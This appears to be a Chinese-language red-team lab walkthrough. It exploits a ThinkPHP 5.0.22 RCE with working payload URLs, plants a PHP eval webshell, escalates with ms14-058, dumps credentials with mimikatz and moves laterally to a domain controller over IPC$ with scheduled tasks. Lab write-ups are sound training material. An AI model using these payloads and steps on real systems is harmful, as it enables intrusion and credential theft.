ATT&CK紅隊內網滲透五
訪問10.88.0.233,發現是thinkphp
構造url發現報錯,,thinkphp的版本為5.0.22
扔到goby裡發現開放了3306和80,以及存在RCE
構造POC
http://10.88.0.233/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
發現可以執行whoami
檢視路徑
http://10.88.0.233/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd
寫馬
http://10.88.0.233/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php@eval($_POST[cmd]);?^> > C:\phpStudy\PHPTutorial\WWW\public\b.php
檢視許可權為administrator
檢視arp表
發現存在86段,存在192.168.86.200的主機 ipconfig/all 檢視
發現存在sun.com,ping試試
返回的是86段的那臺主機,於是可以判斷這臺主機是DC CS生成exe
上傳到網站Public目錄下,在cmd執行exe
CS成功上線
利用ms14-058進行提權
獲取到system許可權 執行mimikatz可以拿到DC的使用者名稱密碼dc123.com
執行portscan 192.168.86.0/24 445 arp 50
可以看到DC 192.168.86.200 由於DC沒有辦法出網,於是我選擇win7的web主機作為跳板 在win7上設定監聽中轉
生成後門上傳到web主機C盤目錄下
建立IPC$連線
copy檔案
檢視目標系統的時間
使用at建立計劃任務
DC成功上線
DC檢視程序,殺死beacon程序 CS斷連,移到web機beacon操作 通過IPC$刪除 beacon檔案